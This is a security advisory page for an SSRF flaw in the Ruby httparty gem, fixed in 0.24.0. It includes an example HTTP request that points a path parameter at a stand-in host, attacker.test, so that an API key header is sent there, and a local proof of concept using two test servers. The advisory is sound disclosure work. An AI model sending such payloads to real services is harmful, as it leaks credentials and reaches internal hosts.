GHSA-hm5p-x4rq-38w4
Suggest an improvement- Source
- https://github.com/advisories/GHSA-hm5p-x4rq-38w4
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/12/GHSA-hm5p-x4rq-38w4/GHSA-hm5p-x4rq-38w4.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-hm5p-x4rq-38w4
- Aliases
- Published
- 2025-12-23T19:31:10Z
- Modified
- 2026-01-11T14:56:54Z
- Severity
-
- 8.2 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N CVSS Calculator
- 7.8 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P CVSS Calculator
- Summary
- httparty Has Potential SSRF Vulnerability That Leads to API Key Leakage
- Details
-
Summary
There may be an SSRF vulnerability in httparty. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers.
Details
When httparty receives a path argument that is an absolute URL, it ignores the
base_urifield. As a result, if a malicious user can control the path value, the application may unintentionally communicate with a host that the programmer did not anticipate.Consider the following example of a web application:
require 'sinatra' require 'httparty' class RepositoryClient include HTTParty base_uri 'http://exmaple.test/api/v1/repositories/' headers 'X-API-KEY' => '1234567890' end post '/issue' do request_body = JSON.parse(request.body.read) RepositoryClient.get(request_body['repository_id']).body # do something json message: 'OK' endNow, suppose an attacker sends a request like this:
POST /issue HTTP/1.1 Host: localhost:10000 Content-Type: application/json { "repository_id": "http://attacker.test", "title": "test" }In this case, httparty sends the
X-API-KEYnot tohttp://example.testbut instead tohttp://attacker.test.A similar problem was reported and fixed in the HTTP client library axios in the past:
https://github.com/axios/axios/issues/6463Also, Python's
urljoinfunction has documented a warning about similar behavior:
https://docs.python.org/3.13/library/urllib.parse.html#urllib.parse.urljoinPoC
Follow these steps to reproduce the issue:
Set up two simple HTTP servers.
mkdir /tmp/server1 /tmp/server2 echo "this is server1" > /tmp/server1/index.html echo "this is server2" > /tmp/server2/index.html python -m http.server -d /tmp/server1 10001 & python -m http.server -d /tmp/server2 10002 &Create a script (for example,
main.rb):require 'httparty' class Client include HTTParty base_uri 'http://localhost:10001' end data = Client.get('http://localhost:10002').body puts dataRun the script:
$ ruby main.rb this is server2
Although
base_uriis set tohttp://localhost:10001/, httparty sends the request tohttp://localhost:10002/.Impact
- Leakage of credentials: If an absolute URL is provided, any API keys or credentials configured in httparty may be exposed to unintended third-party hosts.
- SSRF (Server-Side Request Forgery): Attackers can force the httparty-based program to send requests to other internal hosts within the network where the program is running.
- Affected users: Any software that uses
base_uriand does not properly validate the path parameter may be affected by this issue.
- Database specific
{ "nvd_published_at": "2025-12-23T23:15:45Z", "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2025-12-23T19:31:10Z", "cwe_ids": [ "CWE-918" ] }- References
-
- https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4
- https://nvd.nist.gov/vuln/detail/CVE-2025-68696
- https://github.com/jnunemaker/httparty/commit/0529bcd6309c9fd9bfdd50ae211843b10054c240
- https://github.com/jnunemaker/httparty
- https://github.com/rubysec/ruby-advisory-db/blob/master/gems/httparty/CVE-2025-68696.yml
Affected packages
RubyGems / httparty
Package
- Name
- httparty
- Purl
- pkg:gem/httparty
Affected ranges
- Type
- ECOSYSTEM
- Events
-
Introduced0Unknown introduced version / All previous versions are affectedFixed0.24.0